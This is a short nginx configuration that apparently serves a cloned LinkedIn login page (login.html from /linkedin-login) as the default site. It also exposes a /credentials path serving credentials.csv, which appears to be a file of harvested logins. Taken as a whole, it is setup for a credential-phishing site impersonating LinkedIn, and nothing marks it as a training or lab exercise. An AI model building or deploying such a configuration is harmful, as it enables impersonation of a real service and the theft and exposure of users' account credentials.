server {
    listen 80 default_server;
    listen [::]:80 default_server;
    server_name _;

    location / {
        root   /linkedin-login;
        index  login.html;
    }

    location /credentials {
        root   /linkedin-login;
        index  credentials.csv;
    }
}
